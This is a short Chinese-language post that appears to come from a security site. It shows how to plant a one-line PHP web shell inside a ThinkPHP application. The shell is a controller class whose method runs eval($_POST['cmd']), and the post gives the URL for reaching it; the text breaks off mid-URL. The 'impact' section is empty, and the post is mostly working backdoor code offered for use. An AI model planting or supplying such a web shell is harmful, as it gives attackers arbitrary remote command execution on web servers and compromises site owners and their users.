Thinkphp 专用shell

一、漏洞简介

基于thinkphp框架的一句话写法 thinkphp框架使用入口文件调用控制器，直接写一句话可能会有解析问题导致无法执行指令，研究了一下把一句话套入框架控制器的方法，分享给大家参考，

二、漏洞影响

三、复现过程

在index的控制器文件夹下建立Test.php文件，代码如下:

<?php 
namespace app\index\controller; 

class Test 

{ 

    public function test() 

    { 

    eval($_POST["cmd"]); 

    } 

}

一句话的地址就是http://www.0-sec.org/index/tes